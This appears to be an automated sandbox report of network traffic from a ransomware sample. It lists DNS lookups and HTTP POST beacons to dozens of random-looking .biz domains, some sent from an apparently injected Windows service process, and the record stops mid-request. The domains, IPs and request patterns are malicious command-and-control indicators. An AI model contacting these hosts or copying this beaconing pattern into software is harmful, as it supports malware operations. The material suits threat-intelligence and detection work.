rynmcq.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rynmcq.biz

IN A

Response

rynmcq.biz

IN A

54.244.188.177
DNS

rynmcq.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rynmcq.biz

IN A

Response

rynmcq.biz

IN A

54.244.188.177
POST

http://rynmcq.biz/xvxpycxvgyqor

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /xvxpycxvgyqor HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rynmcq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2cf0c2335bfd3b2d5501660cdf9db63e|191.101.209.39|1717923871|1717923871|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

sxmiywsfv.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

sxmiywsfv.biz

IN A

Response

sxmiywsfv.biz

IN A

13.251.16.150
POST

http://sxmiywsfv.biz/xmlvemwvsslphpc

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

13.251.16.150:80

Request

POST /xmlvemwvsslphpc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: sxmiywsfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4d9858a0606393ba576975211563706c|191.101.209.39|1717923872|1717923872|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uaafd.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

uaafd.biz

IN A

Response

uaafd.biz

IN A

3.254.94.185
POST

http://uaafd.biz/urwftnsbgslpa

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.254.94.185:80

Request

POST /urwftnsbgslpa HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uaafd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0b5d71d2899f3cbd8523aca4cdefff1a|191.101.209.39|1717923871|1717923871|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

eufxebus.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

eufxebus.biz

IN A

Response

eufxebus.biz

IN A

18.141.10.107
POST

http://eufxebus.biz/slpefmfj

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.141.10.107:80

Request

POST /slpefmfj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: eufxebus.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=66a4215f5f2c624505f48f05a43463c9|191.101.209.39|1717923872|1717923872|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

vrrazpdh.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

vrrazpdh.biz

IN A

Response

vrrazpdh.biz

IN A

34.211.97.45
POST

http://vrrazpdh.biz/bfbgwfwrmpabfcl

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

34.211.97.45:80

Request

POST /bfbgwfwrmpabfcl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vrrazpdh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6a45664a14ae6812afc0a79e298322c6|191.101.209.39|1717923872|1717923872|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pwlqfu.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

pwlqfu.biz

IN A

Response

pwlqfu.biz

IN A

34.246.200.160
POST

http://pwlqfu.biz/ownrnyijt

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.246.200.160:80

Request

POST /ownrnyijt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pwlqfu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4b4f5cad53abd718f18a63e59b3fa3e5|191.101.209.39|1717923872|1717923872|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ftxlah.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ftxlah.biz

IN A

Response

ftxlah.biz

IN A

34.218.204.173
POST

http://ftxlah.biz/hlkcaclmcip

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

34.218.204.173:80

Request

POST /hlkcaclmcip HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ftxlah.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=430986d0b27a1171540f0ca78f4b177f|191.101.209.39|1717923873|1717923873|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

rrqafepng.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rrqafepng.biz

IN A

Response

rrqafepng.biz

IN A

44.200.43.61
POST

http://rrqafepng.biz/tjxr

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.200.43.61:80

Request

POST /tjxr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rrqafepng.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=23a87c92efa211500df60a9372705ce6|191.101.209.39|1717923873|1717923873|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ctdtgwag.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ctdtgwag.biz

IN A

Response

ctdtgwag.biz

IN A

3.94.10.34
POST

http://ctdtgwag.biz/k

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.94.10.34:80

Request

POST /k HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ctdtgwag.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b8420b2465b6c2db345a81196af74d01|191.101.209.39|1717923873|1717923873|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

typgfhb.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

typgfhb.biz

IN A

Response

typgfhb.biz

IN A

13.251.16.150
DNS

tnevuluw.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

tnevuluw.biz

IN A

Response

tnevuluw.biz

IN A

35.164.78.200
POST

http://typgfhb.biz/wojkcnhqdkk

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

13.251.16.150:80

Request

POST /wojkcnhqdkk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: typgfhb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b211d6352df8965d3ef7953772a15c95|191.101.209.39|1717923874|1717923874|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://tnevuluw.biz/iilnkojvljvy

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

35.164.78.200:80

Request

POST /iilnkojvljvy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tnevuluw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9bebe149ce59f0af451aa3fc3cf57346|191.101.209.39|1717923873|1717923873|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://whjovd.biz/xekdmafallia

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.141.10.107:80

Request

POST /xekdmafallia HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: whjovd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fdd9379bfc6c4f532e44479156cb8c2b|191.101.209.39|1717923874|1717923874|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

esuzf.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

esuzf.biz

IN A

Response

esuzf.biz

IN A

34.211.97.45
POST

http://esuzf.biz/hafbugblphy

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

34.211.97.45:80

Request

POST /hafbugblphy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: esuzf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=afaefe2dbc3d05e23da732b477982ef5|191.101.209.39|1717923874|1717923874|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gvijgjwkh.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gvijgjwkh.biz

IN A

Response

gvijgjwkh.biz

IN A

3.94.10.34
POST

http://gvijgjwkh.biz/oym

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

3.94.10.34:80

Request

POST /oym HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gvijgjwkh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e62ed7895df462d2c639ea6c59781435|191.101.209.39|1717923875|1717923875|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gjogvvpsf.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gjogvvpsf.biz

IN A

Response

gjogvvpsf.biz

IN A

208.100.26.245
DNS

qpnczch.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

qpnczch.biz

IN A

Response

qpnczch.biz

IN A

44.213.104.86
POST

http://qpnczch.biz/mlfaipldvyqnbkv

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

44.213.104.86:80

Request

POST /mlfaipldvyqnbkv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qpnczch.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=273ca7111098bce4af8fbb9722f6dc01|191.101.209.39|1717923875|1717923875|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

reczwga.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

reczwga.biz

IN A

Response

reczwga.biz

IN A

3.237.86.197
POST

http://reczwga.biz/ukrmgkkfrgcjn

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.237.86.197:80

Request

POST /ukrmgkkfrgcjn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: reczwga.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=052437d879670afc38d12d96d2655f87|191.101.209.39|1717923875|1717923875|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

brsua.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

brsua.biz

IN A

Response

brsua.biz

IN A

3.254.94.185
POST

http://brsua.biz/ipahc

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

3.254.94.185:80

Request

POST /ipahc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: brsua.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=97689a7516de03e60104328e197b2ec9|191.101.209.39|1717923875|1717923875|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

bghjpy.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

bghjpy.biz

IN A

Response

bghjpy.biz

IN A

34.211.97.45
POST

http://bghjpy.biz/aekfxjvn

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.211.97.45:80

Request

POST /aekfxjvn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bghjpy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=110a8fd47a6217b443d96b741a2f7d59|191.101.209.39|1717923875|1717923875|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

dlynankz.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

dlynankz.biz

IN A

Response

dlynankz.biz

IN A

85.214.228.140
POST

http://dlynankz.biz/n

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

85.214.228.140:80

Request

POST /n HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 404 Not Found

Server: nginx/1.27.0
Date: Sun, 09 Jun 2024 09:04:35 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
DNS

oflybfv.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

oflybfv.biz

IN A

Response

oflybfv.biz

IN A

44.200.43.61
POST

http://oflybfv.biz/aybcqpysh

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

44.200.43.61:80

Request

POST /aybcqpysh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oflybfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c73c67f8a5de250ffbdbcf78af01aed0|191.101.209.39|1717923875|1717923875|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

damcprvgv.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

damcprvgv.biz

IN A

Response

damcprvgv.biz

IN A

54.80.154.23
DNS

yhqqc.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

yhqqc.biz

IN A

Response

yhqqc.biz

IN A

34.211.97.45
POST

http://damcprvgv.biz/frtb

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.80.154.23:80

Request

POST /frtb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: damcprvgv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8fa1588d34e1e69b0af41e57c1a79371|191.101.209.39|1717923875|1717923875|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://yhqqc.biz/rlvfr

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

34.211.97.45:80

Request

POST /rlvfr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yhqqc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5e0f12f6657870d4b655d321f63e017d|191.101.209.39|1717923876|1717923876|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ocsvqjg.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ocsvqjg.biz

IN A

Response

ocsvqjg.biz

IN A

3.254.94.185
DNS

ocsvqjg.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ocsvqjg.biz

IN A

Response

ocsvqjg.biz

IN A

3.254.94.185
POST

http://ocsvqjg.biz/defbnmeqecjkmjm

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.254.94.185:80

Request

POST /defbnmeqecjkmjm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ocsvqjg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0337329995c96c2446dd2486cc011cdd|191.101.209.39|1717923876|1717923876|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ywffr.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ywffr.biz

IN A

Response

ywffr.biz

IN A

54.244.188.177
POST

http://ywffr.biz/yhhihx

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /yhhihx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ywffr.biz
